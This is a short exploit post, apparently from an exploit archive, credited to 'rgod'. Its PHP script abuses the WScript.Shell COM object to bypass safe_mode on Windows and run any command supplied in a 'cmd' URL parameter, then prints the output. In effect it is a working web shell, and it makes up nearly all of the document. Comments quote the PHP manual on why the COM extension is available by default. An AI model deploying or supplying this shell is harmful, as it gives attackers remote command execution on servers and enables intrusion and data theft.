
PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit

Code:
<?php
  //PHP COM extensions (inconsistent Win32) safe_mode bypass
  //by rgod

  $____suntzu = new COM("WScript.Shell");
  $____suntzu->Run('c:\windows\system32\cmd.exe /c '.escapeshellarg($_GET[cmd]).' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
  $____suntzoi=file("suntzoi.txt");
  for ($i=0; $i<count($____suntzoi); $i++) {echo nl2br(htmlentities($____suntzoi[$i]));}

  // *quote* from the php manual:
  // There is no installation needed to use these functions; they are part of the PHP core.

  // The windows version of PHP has built in support for this extension. You do not need to load any additional extension in order to use these functions.

  // You are responsible for installing support for the various COM objects that you intend to use (such as MS Word);
  // we don't and can't bundle all of those with PHP.
?>
